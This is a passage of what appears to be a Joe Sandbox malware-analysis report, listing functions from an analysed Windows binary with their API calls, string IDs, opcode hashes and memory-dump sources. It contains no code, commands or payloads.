                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2354583917-0
                                                                                                                                                    • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                                                                    • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                                                                                                    • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                                                                    • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                                                                                                    Function 00464812 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 145libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                    • String ID: Wu
                                                                                                                                                    • API String ID: 2449869053-4083010176
                                                                                                                                                    • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                                                                    • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                                                                                                    • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                                                                    • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                                                                                                    Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                                                    • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                                                                                                    • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                                                    • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                                                                                                    Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                                                                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 896007046-0
                                                                                                                                                    • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                                                    • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                                                                                                    • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                                                    • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                                                                                                    Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                                                                                                    • GetFocus.USER32 ref: 00448ACF
                                                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3429747543-0
                                                                                                                                                    • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                                                    • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                                                                                                    • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                                                    • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                                                                                                    Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                                                                                                      • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                                                                                                      • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                                                    • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                                                                                                    • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                                                                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                                                                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                                                                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3300667738-0
                                                                                                                                                    • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                                                                                                    • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                                                                                                    • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                                                                                                    • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                                                                                                    Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                                                                                    • __swprintf.LIBCMT ref: 0045D4E9
                                                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                    • String ID: %lu$\VH
                                                                                                                                                    • API String ID: 3164766367-2432546070
                                                                                                                                                    • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                                                    • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                                                                                                    • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                                                    • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                                                                                                    Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                                                                                    • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                                                    • API String ID: 3850602802-3636473452
                                                                                                                                                    • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                                                    • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                                                                                                    • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                                                    • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                                                                                                    Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3985565216-0
                                                                                                                                                    • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                                                                    • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                                                                                                    • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                                                                    • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                                                                                                    Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _malloc.LIBCMT ref: 0041F707
                                                                                                                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                                    • _free.LIBCMT ref: 0041F71A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap_free_malloc
                                                                                                                                                    • String ID: [B
                                                                                                                                                    • API String ID: 1020059152-632041663
                                                                                                                                                    • Opcode ID: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                                                                                                                                    • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                                                                                                    • Opcode Fuzzy Hash: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                                                                                                                                    • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                                                                                                    Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                                                                                                      • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1957940570-0
                                                                                                                                                    • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                                                    • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                                                                                                    • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                                                    • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                                                                                    Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004302E6
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00430364
                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3220332590-0
                                                                                                                                                    • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                                                    • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                                                                                                    • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                                                    • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                                                                                                    Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1612042205-0
                                                                                                                                                    • Opcode ID: e3179c2987a62733692ceab765edd20725f5b951b4ff8c35c0042417233c487f
                                                                                                                                                    • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
